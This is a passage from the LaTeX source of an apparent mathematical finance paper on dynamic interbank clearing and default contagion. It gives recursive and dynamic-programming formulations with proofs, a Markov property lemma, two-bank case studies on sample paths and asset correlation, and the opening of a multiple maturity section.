Within Theorem~\ref{thm:1maturity-exist}, we only prove the existence of a clearing solution. Generically, there may not be a unique solution. This can clearly be seen by noting that the static model needs to be satisfied by $(\vec{K}(T),\ind{\vec{K}(T) \geq \vec{0}})$ at maturity time $T$ (in the network formed by banks solvent through $t_{\ell-1}$). Therefore, just by using this static model, we can find that the dynamic clearing system~\eqref{eq:1maturity} need not have a unique solution.
\end{remark}
\begin{remark}\label{rem:integral}
Consider a clearing solution for the tree model $(\Omega^n,\mathcal{F}^n,(\mathcal{F}^n_{l\Delta t})_{l = 0}^{T/\Delta t},\P^n)$ of~\cite{he1990convergence}. Then one can show that, for each bank $i=1,\ldots,n$, there is a predictable process $\boldsymbol{\theta}_i $ such that $\Delta P_i(t) = \boldsymbol{\theta}_{i}(t)^\top \Delta \tilde{\vec{x}}(t)$, for every time-step $[t,t+\Delta t]$, where $\tilde\vec{x}(t) := e^{-rt}\vec{x}(t)$ is the vector of discounted external asset values. This highlights how the impact of contagion adjusts `continuously' to the movements of the external assets. It also highlights a stark contrast to earlier models based, either explicitly or implicitly, on historical price accounting whereby the value of interbank debt only updates at an actualized default due solely to the realized losses (c.f.~\cite{feinstein2021dynamic} and references therein). In the notation of martingale transforms, we have $P_i(t) = (\theta \bullet \tilde{\vec{x}})(t)$, also known as a predictable representation of $P_i$. Using the martingale property of $P_i$ and exploiting the particular tree structure with $n+1$ branches for every node and a non-degenerate covariance matrix for the $n$ external assets, this predictable representation can be deduced from a system of $n$ linear equations in $n$ unknowns. Analogously, a predictable representation can be given for the discounted net worths $e^{-rt}\vec{K}(t)$, noting that these discounted processes are martingales by Assumption~\ref{ass:msr}. For a general tree, such representations are much more complicated; we refer the interested reader to, e.g., \cite[Section IV.3]{protter2005stochastic} and~\cite[Section 3]{ararat2021set}.
\end{remark}
\subsection{An explicit forward-backward representation}\label{sec:1maturity-recursion}
Within~\eqref{eq:1maturity}, we defined the single maturity clearing problem as a fixed point problem. However, the formulation of the clearing system $\Psi^T$ is seemingly complex to compute due to the need to find the probability of solvency $\Psi^T_{\vec{P}}$. Within this section, we will focus on a backwards recursion that can be used to simplify this computation. The basic concept is formulated within~\eqref{eq:1maturity-recursion} below such that the clearing problem is rewritten as $\bar\Psi^T: \mathbb{D}^T \to \mathbb{D}^T$. Within Proposition~\ref{prop:1maturity-recursion}, we demonstrate that the fixed points of $\Psi^T$ and $\bar\Psi^T$ coincide.
Let $(\vec{K},\vec{P},\boldsymbol{\tau}) \in \mathbb{D}^T$ then:
\begin{align}
\label{eq:1maturity-recursion} \bar\Psi^T(\vec{K},\vec{P},\boldsymbol{\tau}) &:= (\Psi^T_{\vec{K}}(t_l,\vec{P}(t_l)) \; , \; \bar\Psi^T_{\vec{P}}(t_l,\vec{P}(t_{[l+1]\wedge\ell}),\boldsymbol{\tau}) \; , \; \Psi^T_{\boldsymbol{\tau}}(\vec{K}))_{l = 0}^\ell \\
\bar\Psi_{\vec{P},i}^T(t_l,\tilde{\vec{P}},\boldsymbol{\tau},\omega_{t_l}) &:= \begin{cases} \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}})\tilde{P}_i(\omega_{t_{l+1}})}{\P(\omega_{t_l})} &\text{if } l < \ell \\ \ind{\tau_i(\omega_T) > T} &\text{if } l = \ell \end{cases} & \forall \omega_{t_l} \in \Omega_{t_l},~i = 1,...,n.
\end{align}
\begin{proposition}\label{prop:1maturity-recursion}
$(\vec{K},\vec{P},\boldsymbol{\tau}) \in \mathbb{D}^T$ is a clearing solution of~\eqref{eq:1maturity} if and only if it is a fixed point of~\eqref{eq:1maturity-recursion}.
\end{proposition}
\begin{proof}
Let $(\vec{K},\vec{P},\boldsymbol{\tau}) \in \mathbb{D}^T$ be a fixed point of~\eqref{eq:1maturity}. This is a fixed point of~\eqref{eq:1maturity-recursion} if and only if $P_i(t_l,\omega_{t_l}) = \bar\Psi_{\vec{P},i}^T(t_l,\vec{P}(t_{[l+1]\wedge\ell}),\boldsymbol{\tau},\omega_{t_l})$.
\begin{itemize}
\item At $l = \ell$: $P_i(T,\omega_T) = \P(\tau_i > T | \mathcal{F}_T)(\omega_T) = \ind{\tau_i(\omega_T) > T}$ for every $\omega_T \in \Omega_T$ by construction of $\mathcal{F}_T = \mathcal{F}$.
\item At $l < \ell$:
Fix $\omega_{t_l} \in \Omega_{t_l}$,
\begin{align*}
P_i(t_l,\omega_{t_l}) &= \P(\tau_i > T | \mathcal{F}_{t_l})(\omega_{t_l}) = \frac{\P(\tau_i > T , \omega_{t_l})}{\P(\omega_{t_l})} = \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\tau_i > T , \omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \P(\tau_i > T | \mathcal{F}_{t_{l+1}})(\omega_{t_{l+1}})}{\P(\omega_{t_l})} = \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) P(t_{l+1},\omega_{t_{l+1}})}{\P(\omega_{t_l})}.
\end{align*}
\end{itemize}
Let $(\vec{K},\vec{P},\boldsymbol{\tau}) \in \mathbb{D}^T$ be a fixed point of~\eqref{eq:1maturity-recursion}. This is a fixed point of~\eqref{eq:1maturity} if and only if $P_i(t_l) = \Psi_{\vec{P},i}^T(t_l,\boldsymbol{\tau})$ almost surely very every time $l = 0,1,...,\ell$.
\begin{itemize}
\item At $l = \ell$: $P_i(T,\omega_T) = \ind{\tau_i(\omega_T) > T} = \P(\tau_i > T | \mathcal{F}_T)(\omega_T)$ for every $\omega_T \in \Omega_T$ by construction of $\mathcal{F}_T = \mathcal{F}$.
\item At $l < \ell$: Assume $P_i(t_{l+1}) = \Psi_{\vec{P},i}^T(t_{l+1},\boldsymbol{\tau})$ at time $t_{l+1}$ almost surely. Fix $\omega_{t_l} \in \Omega_{t_l}$,
\begin{align*}
P_i(t_l,\omega_{t_l}) &= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) P(t_{l+1},\omega_{t_{l+1}})}{\P(\omega_{t_l})} = \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \P(\tau_i > T | \mathcal{F}_{t_{l+1}})(\omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\tau_i > T , \omega_{t_{l+1}})}{\P(\omega_{t_l})} = \frac{\P(\tau_i > T , \omega_{t_l})}{\P(\omega_{t_l})} = \P(\tau_i > T | \mathcal{F}_{t_l})(\omega_{t_l}).
\end{align*}
\end{itemize}
\end{proof}
In fact,~\eqref{eq:1maturity-recursion} can be viewed as a fixed point in $\vec{P} \in \prod_{l = 0}^\ell [0,1]^{|\Omega_{t_l}| \times n}$ only. This can be done by explicitly defining the dependence of the net worths and default time on the probability of solvency. Specifically, this joint clearing problem in $(\vec{K},\vec{P},\boldsymbol{\tau})$ can be viewed as a forward-backward equation in $\vec{P}$ alone, i.e.,
\begin{equation}\label{eq:1maturity-recursion-P}
\vec{P} = \left[\bar\Psi^T_{\vec{P}}\left(t_l,\vec{P}(t_{[l+1]\wedge\ell}),\Psi^T_{\boldsymbol{\tau}}\left(\Psi^T_{\vec{K}}(t_k,\vec{P}(t_k))_{k = 0}^\ell\right)\right)\right]_{l = 0}^\ell.
\end{equation}
We refer to this as a forward-backward equation since $\vec{P} \mapsto \Psi^T_{\boldsymbol{\tau}}(\Psi^T_{\vec{K}}(\cdot,\vec{P}))$ is calculated forward-in-time whereas $\bar\Psi^T_{\vec{P}}$ is computed recursively backward-in-time.
\begin{corollary}\label{cor:1maturity-recursion}
$(\vec{K},\vec{P},\boldsymbol{\tau}) \in \mathbb{D}^T$ is a clearing solution of~\eqref{eq:1maturity} if and only if $\vec{P}$ is a fixed point of~\eqref{eq:1maturity-recursion-P} with $\vec{K} = \Psi^T_{\vec{K}}(t_l,\vec{P}(t_l))_{l = 0}^\ell$ and $\boldsymbol{\tau} = \Psi^T_{\boldsymbol{\tau}}(\Psi^T_{\vec{K}}(t_l,\vec{P}(t_l))_{l = 0}^\ell)$.
\end{corollary}
\begin{proof}
This is an immediate consequence of Proposition~\ref{prop:1maturity-recursion}.
\end{proof}
\subsection{Dynamic programming principle representation}\label{sec:1maturity-dpp}
With~\eqref{eq:1maturity-recursion}, we provided a recursive formulation for the clearing solutions. Within this section we will find an additional equivalent clearing problem that directly makes use of the dynamic programming principle for the \emph{maximal} clearing solution. This formulation is used in Lemma~\ref{lemma:markov} to prove that the maximal clearing solution $(\vec{K}^\uparrow,\vec{P}^\uparrow,\boldsymbol{\tau}^\uparrow) \in \mathbb{D}^T$ of~\eqref{eq:1maturity} (and as is proven to exist in Theorem~\ref{thm:1maturity-exist}) is Markovian. Additionally, it is this dynamic programming formulation that allows us to study the multiple maturity setting in Section~\ref{sec:Kmaturity}.
\begin{remark}
Throughout this section, we focus entirely on the maximal clearing solution. The minimal clearing solution can likewise be considered with only small alterations to the proofs.
\end{remark}
To formalize the clearing problem as the dynamic programming principle, we need to introduce the operator $\FIX$ which we use to denote the \emph{maximal} fixed point.
With this fixed point operator, we can define the following equivalent clearing problem in $(\vec{K},\vec{P})$ reliant on the propagation of information forward-in-time through the auxiliary variables $\boldsymbol{\iota} \in \{0,1\}^n$. Specifically, consider $\hat\Psi^T: \mathbb{I} \to \mathcal{L}_T \times \mathcal{L}_T$ where $\mathbb{I} := \{(t_l,\boldsymbol{\iota}) \; | \; l \in \{0,1,...,\ell\}, \; \boldsymbol{\iota} \in \{0,1\}^{|\Omega_{t_{[l-1]^+}}| \times n}\}$ (with $\hat\Psi^T(t,\boldsymbol{\iota}) \in \hat\mathbb{D}^T(t) := \{(\vec{K}(t),\vec{P}(t)) \; | \; (\vec{K},\vec{P},T\vec{1}) \in \mathbb{D}^T\}$ for any time $t$) constructed as:
\begin{align}\label{eq:1maturity-dpp}
\hat\Psi^T(t_l,\boldsymbol{\iota}) &:= \left(\begin{array}{c}\hat\Psi^T_{\vec{K}}(t_l,\boldsymbol{\iota}) \\ \hat\Psi^T_{\vec{P}}(t_l,\boldsymbol{\iota})\end{array}\right) \\
\nonumber &=
\begin{cases}
\FIX_{(\tilde\vec{K},\tilde\vec{P}) \in \hat\mathbb{D}^T(t_l)} \left(\begin{array}{c} \Psi^T_{\vec{K}}(t_l,\tilde\vec{P}) \\ \left[\sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}})\hat\Psi^T_{\vec{P}}(t_{l+1},\diag{\boldsymbol{\iota}(\omega_{t_l})\ind{\tilde\vec{K}(\omega_{t_l}) \geq \vec{0}}}}{\P(\omega_{t_l})}\right]_{\omega_{t_l} \in \Omega_{t_l}} \end{array}\right) &\text{if } l < \ell \\
\FIX_{(\tilde\vec{K},\tilde\vec{P}) \in \hat\mathbb{D}^T(T)} \left(\begin{array}{c} \Psi^T_{\vec{K}}(T,\tilde\vec{P}) \\ \diag{\boldsymbol{\iota}}\ind{\tilde\vec{K} \geq \vec{0}} \end{array}\right) &\text{if } l = \ell
\end{cases}
\end{align}
where $\boldsymbol{\iota}$ denotes the prior information on whether a bank has defaulted ($\iota_i = 0$) or not ($\iota_i = 1$) up to time $t_{l-1}$ when being used as an input for time $t_l$.
Before continuing, we wish to remark that $\hat\Psi^T(t,\boldsymbol{\iota})$ is well-defined insofar as the maximal fixed point exists for every time $t$ and set of solvent banks $\boldsymbol{\iota}$.
\begin{proposition}\label{prop:1maturity-dpp-define}
$\hat\Psi^T(t,\boldsymbol{\iota})$ is well-defined for every $(t,\boldsymbol{\iota}) \in \mathbb{I}$, i.e., the maximal fixed point exists (and is unique) for any combination of inputs.
\end{proposition}
\begin{proof}
As with Theorem~\ref{thm:1maturity-exist}, this result follows from a trivial application of Tarski's fixed point theorem.
\end{proof}
\begin{proposition}\label{prop:1maturity-dpp}
Let $(\vec{K},\vec{P})$ be the realized solution from $\hat\Psi^T(0,\vec{1})$, i.e., $(\vec{K}(0,\omega_0),\vec{P}(0,\omega_0)) = \hat\Psi^T(0,\vec{1},\omega_0)$ and $(\vec{K}(t_l,\omega_{t_l}),\vec{P}(t_l,\omega_{t_l})) = \hat\Psi^T(t_l,\ind{\inf_{k < l} \vec{K}(t_k,\omega_{t_k}) < \vec{0}},\omega_{t_l})$ for every $\omega_{t_l} \in \Omega_{t_l}$ and $l = 1,2,...,\ell$. Then $(\vec{K},\vec{P},\Psi^T_{\boldsymbol{\tau}}(\vec{K}))$ is the \emph{maximal} fixed point to~\eqref{eq:1maturity}.
\end{proposition}
\begin{proof}
Define $(\vec{K},\vec{P})$ to be the realized solution from $\hat\Psi^T(0,\vec{1})$. Let $\boldsymbol{\tau} := \Psi_{\boldsymbol{\tau}}^T(\vec{K})$ be the associated default times and $\boldsymbol{\iota}(t_l,\omega_{t_l}) := \prod_{k = 0}^{l-1} \ind{\vec{K}(t_k,\omega_{t_l}) \geq \vec{0}}$ be the realized (auxiliary) solvency process at time $t$ and in state $\omega_{t_l} \in \Omega_{t_l}$ (and $\boldsymbol{\iota}(0,\omega_0) = \vec{1}$).
(We wish to note that $\boldsymbol{\iota}(t_l) \in \mathcal{L}_{t_{[l-1]^+}}^n$ and as such could be indexed by the preceding states $\omega_{t_{[l-1]^+}} \in \Omega_{t_{[l-1]^+}}$ instead; we leave the use of $\omega_{t_l}$ as we find it is clearer notationally.)
First, we will show that $(\vec{K},\vec{P},\boldsymbol{\tau})$ is a clearing solution of~\eqref{eq:1maturity} via the representation~\eqref{eq:1maturity-recursion}, i.e., $(\vec{K},\vec{P},\boldsymbol{\tau}) = \bar\Psi^T(\vec{K},\vec{P},\boldsymbol{\tau})$.
Second, we will show that this solution must be the maximal clearing solution as proven to exist in Theorem~\ref{thm:1maturity-exist}.
\begin{enumerate}
\item By construction of $\hat\Psi^T$, $(\vec{K},\vec{P},\boldsymbol{\tau}) = \bar\Psi^T(\vec{K},\vec{P},\boldsymbol{\tau})$ if and only if $\vec{P}(t_l) = \bar\Psi^T_{\vec{P}}(t_l,\vec{P}(t_{[l+1]\wedge\ell}),\boldsymbol{\tau})$ for every time $l \in \{0,1,...,\ell\}$.
At maturity, $\vec{P}(T) = \bar\Psi^T_{\vec{P}}(T,\vec{P}(T),\boldsymbol{\tau})$ trivially by construction of $\boldsymbol{\tau}$.
Consider now $l < \ell$ and assume $\vec{P}(t_{l+1}) = \hat\Psi^T_{\vec{P}}(t_{l+1},\iota(t_{l+1}))= \bar\Psi^T_{\vec{P}}(t_l,\vec{P}(t_{l+1}),\boldsymbol{\tau})$. By construction, $\vec{P}(t_l,\omega_{t_l}) = \bar\Psi^T_{\vec{P}}(t_{l+1},\vec{P}(t_{l+1}),\boldsymbol{\tau},\omega_{t_l})$ and the result is proven.
\item Now assume there exists some clearing solution $(\vec{K}^\dagger,\vec{P}^\dagger,\boldsymbol{\tau}^\dagger) \gneq (\vec{K},\vec{P},\boldsymbol{\tau})$. Then we can rewrite the form of $(\vec{K}^\dagger,\vec{P}^\dagger)$ as:
\begin{align*}
(\vec{K}^\dagger,\vec{P}^\dagger) &= (\Psi^T_{\vec{K}}(t_l,\vec{P}^\dagger(t_l)) , \bar\Psi^T_{\vec{P}}(t_l,\vec{P}^\dagger(t_{[l+1]\wedge\ell}),\Psi^T_{\tau}(\vec{K}^\dagger)))_{l = 0}^\ell
\end{align*}
through the use of the clearing formulation $\bar\Psi^T$ and explicitly applying $\boldsymbol{\tau}^\dagger = \Psi^T_{\boldsymbol{\tau}}(\vec{K}^\dagger)$. Following the logic of the prior section of this proof, it must follow that
\begin{equation*}
\vec{P}^\dagger(t_l,\omega_{t_l}) = \begin{cases} \diag{\ind{\inf_{k < l} \vec{K}(t_k,\omega_{t_l}) \geq \vec{0}}} \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \vec{P}(t_{l+1},\omega_{t_{l+1}})}{\P(\omega_{t_l})} &\text{if } l < \ell \\ \ind{\inf_{k \in [0,\ell]} \vec{K}(t_k,\omega_T) \geq \vec{0}} &\text{if } l = \ell \end{cases}
\end{equation*}
for every time $t_l$ and state $\omega_{t_l} \in \Omega_{t_l}$.
That is, $(\vec{K}^\dagger(t_l),\vec{P}^\dagger(t_l)) = \hat\Psi^T(t_l,\ind{\inf_{k < l} \vec{K}(t_k,\omega_{t_l}) \geq \vec{0}})_{\omega_{t_l} \in \Omega_{t_l}}$ satisfies all of the fixed point problems within the construction of $\hat\Psi^T$ at all times $t_l$.
We will complete this proof via backwards induction with, to simplify notation, $\boldsymbol{\iota}(t_l) = \ind{\inf_{k < l} \vec{K}^\dagger(t_k) \geq \vec{0}}$.
Consider maturity $T$, it must follow that $(\vec{K}^\dagger(T),\vec{P}^\dagger(T)) \leq \hat\Psi^T(T,\boldsymbol{\iota}(T))$ by the definition of the fixed point operator $\FIX$..
Consider some time $t_l < T$ and assume $(\vec{K}^\dagger(t_{l+1}),\vec{P}^\dagger(t_{l+1})) \leq \hat\Psi^T(t_{l+1},\boldsymbol{\iota}(t_{l+1}))$. By the backward recursion used within $\hat\Psi^T_{\vec{P}}(t_l,\boldsymbol{\iota}(t_l))$, it follows that
\begin{align*}
\vec{P}^\dagger(t_l,\boldsymbol{\iota}(t_l)) &= \diag{\boldsymbol{\iota}(t_l)}\left[\sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}})\vec{P}(t_{l+1},\omega_{t_{l+1}})}{\P(\omega_{t_l})}\right]_{\omega_{t_l} \in \Omega_{t_l}} \\
&\leq \diag{\boldsymbol{\iota}(t_l)}\left[\sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}})\hat\Psi^T_{\vec{P}}(t_{l+1},\boldsymbol{\iota}(t_{l+1},\omega_{t_{l+1}}),\omega_{t_{l+1}})}{\P(\omega_{t_l})}\right]_{\omega_{t_l} \in \Omega_{t_l}}.
\end{align*}
Further, by the monotonicity of $\Psi^T_{\vec{K}}$, it would follow that $(\vec{K}^\dagger(t_l),\vec{P}^\dagger(t_l)) \leq \hat\Psi^T(t_l,\boldsymbol{\iota}(t_l))$.
This, together with the trivial monotonicity of $\hat\Psi^T$ w.r.t.\ the solvency indicator $\boldsymbol{\iota}$, forms a contradiction to the original assumption.
\end{enumerate}
\end{proof}
We conclude this discussion of the single maturity clearing problem by proving that the maximal clearing solution is Markovian on the extended state space $(\vec{x},\vec{K},\vec{P},\boldsymbol{\iota})$. Without the inclusion of the auxiliary variable $\boldsymbol{\iota}$, the solution $(\vec{x},\vec{K},\vec{P})$ is clearly not Markovian.
\begin{lemma}\label{lemma:markov}
Consider Markovian external assets $\vec{x}(t_l) = f(\vec{x}(t_{l-1}),\tilde\epsilon(t_l))$ for independent perturbations $\tilde\epsilon$.
Let $(\vec{K},\vec{P})$ be the realized solution from $\hat\Psi^T(0,\vec{1})$ with $\boldsymbol{\iota}(t_l) := \prod_{k = 0}^{l-1} \ind{\vec{K}(t_k) \geq \vec{0}}$ denoting the realized solvency process.
Then the joint process $(\vec{x},\vec{K},\vec{P},\boldsymbol{\iota})$ is Markovian.
\end{lemma}
\begin{proof}
Note that $\boldsymbol{\iota}(t_l) = \diag{\boldsymbol{\iota}(t_{l-1})}\ind{\vec{K}(t_{l-1}) \geq \vec{0}}$.
Therefore Markovianity follows directly from~\eqref{eq:1maturity-dpp} as $(\vec{K}(t_l),\vec{P}(t_l)) = \hat\Psi^T(t_l,\boldsymbol{\iota}(t_l);\vec{x}(t_l)) = \hat\Psi^T(t_l,\diag{\boldsymbol{\iota}(t_{l-1})}\ind{\vec{K}(t_{l-1}) \geq \vec{0}};f(\vec{x}(t_{l-1}),\tilde\epsilon(t_l)))$.
\end{proof}
\subsection{Case studies}\label{sec:1maturity-cs}
For the case studies within this section, recall the geometric random walk~\eqref{eq:gbm} constructed on the tree $(\Omega^n,\mathcal{F}^n,(\mathcal{F}^n_{l\Delta t})_{l = 0}^{T/\Delta t},\P^n)$ within Section~\ref{sec:setting-tree}.
That is, we consider the assets $x_k$ of each bank $k$ to be generated by
\begin{align*}
x_k(t+\Delta t,\omega_{t+\Delta t,(n+1)(i-1)+j}^n) &= x_k(t,\omega_{t,\omega_{t,i}}^n)\exp\left((r - \frac{\sigma_{kk}^2}{2})\Delta t + \sigma_k^\top \tilde{\epsilon}_j\sqrt{\Delta t}\right)
\end{align*}
for some initial point $x_k(0,\Omega^n) \in \mathbb{R}^n_{++}$, correlation structure $\sigma$, and such that $\tilde{\epsilon} = (\tilde{\epsilon}_1,...,\tilde{\epsilon}_{n+1}) \in \mathbb{R}^{n \times (n+1)}$ is generated from an $(n+1)\times(n+1)$ orthogonal matrix as in~\cite{he1990convergence}.
Define the discounted assets as
\[
\tilde{\vec{x}}(t,\omega_t^n) := \exp(-rt)\vec{x}(t,\omega_t^n)
\]
for every time $t$ and state $\omega_t^n \in \Omega_t^n$. One can check that these discounted asset values $\tilde{\vec{x}}$ are martingales.
We will consider two primary case studies within this section to demonstrate the details of this single maturity model. First, we will present sample paths of the clearing solution over time to investigate the contagion mechanism in practice. Second, we will vary the correlation structure between banks in order to investigate the sensitivity of the model to this parameter. For simplicity, we will assume the recovery rate $\beta = 0$ throughout these case studies so that we generalize, e.g., the Gai--Kapadia system~(\cite{GK10}).
\subsubsection{Sample paths}\label{sec:1maturity-cs-path}
In order to demonstrate the network dynamics of this contagion model, we will consider an illustrative simple 2 bank (plus society node) system with zero risk-free rate $r = 0$. We will consider the terminal time $T = 1$ with time intervals $\Delta t = 0.1$. At the maturity $T$, the network of obligations is given by
\[\vec{L}_0 = \left(\begin{array}{ccc} 0.5 & 1 & 0 \\ 0.5 & 0 & 1 \end{array}\right)\]
where the first column indicates the external obligations.
The external assets have the same variance $\sigma^2 = 0.25$ with correlation of $\rho = 0.5$; both banks begin with $x_i(0) = 1.5$ in external assets for $i \in \{1,2\}$.
With this simple setting, we are able to use the forward-backward model~\eqref{eq:1maturity-recursion} to compute the clearing net worths $\vec{K}$ and probabilities of solvency $\vec{P}$. In Figure~\ref{fig:path}, a single sample path of the external assets $\vec{x}(\omega)$, net worths $\vec{K}(\omega)$, and probabilities of solvency $\vec{P}(\omega)$ are displayed. Along this sample path, bank $2$ (displayed in red) defaults on its obligations at time $t = 0.7$ though bank $1$ (displayed in blue) remains solvent until maturity. This is clearly seen in both Figure~\ref{fig:path-K} of the net worths and Figure~\ref{fig:path-P} of the probability of solvency. Notably, even at time $t = 0.7$, bank $2$'s external assets are approximately $x_2(0.7) \approx 0.769$; this means that, without considering default contagion (i.e., marking all interbank assets in full) bank $2$ would \emph{not} be in default.
This demonstrates the impact of using this endogenous network valuation adjustment since, along this path, bank $1$ does not default, yet the possibility that it fails to repay its obligations due to uncertainty in the future forces bank $2$ to mark down its interbank assets enough so that it is driven into insolvency. Thus, a type of default contagion from bank $1$ to itself over time (in unrealized paths of the tree) leads to the interbank default contagion that is more typically studied in the Gai--Kapadia model.
\begin{figure}[h]
\centering
\begin{subfigure}[t]{0.3\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankPath-x.eps}
\caption{External assets $\vec{x}$}
\label{fig:path-x}
\end{subfigure}
~
\begin{subfigure}[t]{0.3\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankPath-K.eps}
\caption{Net worths $\vec{K}$}
\label{fig:path-K}
\end{subfigure}
~
\begin{subfigure}[t]{0.3\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankPath-P.eps}
\caption{Probabilities of solvency $\vec{P}$}
\label{fig:path-P}
\end{subfigure}
\caption{Section~\ref{sec:1maturity-cs-path}: A single sample path for the external assets $\vec{x}$, net worths $\vec{K}$, and probabilities of solvency $\vec{P}$ for both banks.}
\label{fig:path}
\end{figure}
\subsubsection{Dependence on correlation}\label{sec:1maturity-cs-corr}
Consider again the simple $n = 2$ bank network of Section~\ref{sec:1maturity-cs-path}. Rather than study a single sample path of this system, we will instead vary the correlation $\rho \in (-1,1)$ to characterize the nontrivial behavior of this clearing model. As we will only investigate the behavior of the system at the initial time $t = 0$, and because the system is symmetric, throughout this case study we will without loss of generality only discuss bank $1$.
\begin{figure}[h]
\centering
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankCorr-P-10.eps}
\caption{The probability of solvency $P_1(0)$ at time $t = 0$ for bank $1$.}
\label{fig:corr-P}
\end{subfigure}
~
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankCorr-defaults.eps}
\caption{The probability of one or both banks being in default as measured at time $t = 0$.}
\label{fig:corr-defaults}
\end{subfigure}
\caption{Section~\ref{sec:1maturity-cs-corr}: The impact of the correlation $\rho \in (-1,1)$ between the external asset values on health of the financial system as measured by probabilities of solvency/default.}
\label{fig:corr}
\end{figure}
The probability of solvency $P_1(0)$ at time $t = 0$ as a function of the correlation $\rho$ between the banks' external assets is provided in Figure~\ref{fig:corr-P}; we wish to note that, due to the construction of this network, $K_1(0) = P_1(0)$. Notably, the response of the probability of solvency to $\rho$ follows a staircase structure.
This structure is due to the discrete nature of the tree model considered within this work. Specifically, because of the discrete time points and asset values, for a branch of the tree to move sufficiently to cause a bank to move from solvency into default (or vice versa) requires a sufficient change in the system parameters (e.g., the correlation); once such a sufficient change occurs to the tree, due to the possibility of contagion across time and between banks, there can be knock-on effects that generate large jumps in the health of the financial system. These probabilities of solvency can be compared to the probability of solvency without consideration for the interbank network (i.e., setting $L_{12} = L_{21} = 0$). Without an interbank network there is no avenue for contagion within this system and, as such, bank $1$ is solvent in more scenarios under this setting. In fact, the only influence that the asset correlations $\rho$ have in this no-interbank network setting is due to the construction of the tree following~\cite{he1990convergence}.
In Figure~\ref{fig:corr-defaults}, we investigate the probability of defaults. For this we take the view of a regulator who would be concerned with the number of defaults but not which institution is failing.
The blue solid line displays the probability that at least one of the banks will default (as measured at time $t = 0$). As with the probability that bank $1$ is solvent $P_1(0)$, this has a step structure that is non-monotonic in the correlation $\rho$.
The red dashed line displays the probability that both banks will default (as measured at time $t = 0$). Here we see that, though there is roughly a 5\% chance that there is a default in the system when $\rho \approx -1$, there is no possibility of a joint default when the banks' external assets are highly negatively correlated. As the correlation increases, so does the likelihood of contagion in which both banks default (up until the banks default simultaneously, without the need for contagion, if $\rho = 1$).
We wish to conclude this case study by comparing the non-monotonicity exhibited here with the network valuation adjustment considered in~\cite{banerjee2022pricing}. In that work, which focuses on the Eisenberg--Noe clearing model~(\cite{EN01,RV13}) without early defaults, the comonotonic scenario (i.e., $\rho = 1$) is found to have the largest default contagion. Herein, with early defaults, we find that this no longer holds.
There does exist general downward trend in the probability of solvency is found with the highest probability of solvency occurring near $\rho \approx -1$. When the correlations are highly negative, for one bank to be in distress (through the downward drift of its external assets) directly means the other bank has a large surplus; in this way the interbank assets act as a diversifying investment to reduce the risk of default.
However, in contrast to the downward trend evidenced in the probability of solvency, a significant upward jump upward is evidenced at $\rho \approx 0.75$. This non-monotonicity makes clear the non-triviality of the constructed systemic model.
\section{Multiple maturity setting}\label{sec:Kmaturity}
In contrast to the prior section in which all obligations are due at the same maturity $T$, we now wish to consider the possibility of obligations at every time $t_l$. At each maturity time $t_l$ a network of obligations $\vec{L}^l$ exists; the balance sheet otherwise is constructed as in the single maturity setting as presented in Section~\ref{sec:1maturity-bs}. As in~\cite{KV16,BBF18} if a bank defaults on an obligation then it also defaults on all subsequent obligations as well. Herein, as opposed to the structure of the single maturity setting in Section~\ref{sec:1maturity}, we need to distinguish between solvency and liquidity as a bank may have positive capital but be unable to satisfy its short-term obligations.
We review the balance sheet of the banks in the system within Section~\ref{sec:Kmaturity-bs} with emphasis on the additional considerations when multiple maturities are included.
The constructed mathematical model for this multiple maturity setting is provided within Section~\ref{sec:Kmaturity-model}. Rather than providing detailed equivalent forward-backward and dynamic programming formulations, we only comment on how such models can be presented in this setting.
This model is then used in Section~\ref{sec:Kmaturity-cs} to consider the implications of default contagion on the term structures for bank liabilities.
\subsection{Balance sheet construction}\label{sec:Kmaturity-bs}
Following the balance sheet constructed within Section~\ref{sec:1maturity-bs}, but with minor modification, banks hold \emph{three} types of assets at time $t_l$: external (risky) assets $x_i(t_l) \in \mathcal{L}_{t_l}$, external (risk-free) assets, and interbank assets $\sum_{j = 1}^n L_{ji}^k$ at time $t_k$ with $k > l$ where $L_{ji}^k \geq 0$ is the total obliged from bank $j$ to $i$ at time $t_k$ ($L_{ii}^k = 0$ so as to avoid self-dealing). Notably, as the bank may have received interbank payments at time $t_k$ with $k \leq l$ as well, the bank may have assets held in the risk-free asset. Specifically, at time $t_l$, the bank can split its cash holdings between its external risky and risk-free assets so that the (simple) return from time $t_l$ to $t_{l+1}$ is:
\[R_i(t_{l+1},\alpha_i(t_l)) := \left[e^{r(t_{l+1}-t_l)}\alpha_i(t_l) + \frac{x_i(t_{l+1})}{x_i(t_l)}(1-\alpha_i(t_l))\right]-1\]
where $\alpha_i(t_l) \in \mathcal{L}_{t_l}$ provides the fraction of the cash account invested at time $t_l$ in the risk-free asset and, accordingly, $1-\alpha_i(t_l)$ provide the fraction of the cash account invested at time $t_l$ in the risky asset. We will assume throughout this section that $\alpha_i(t_l,\omega_{t_l}) \in [0,1]$ so that bank $i$ is long in both assets.
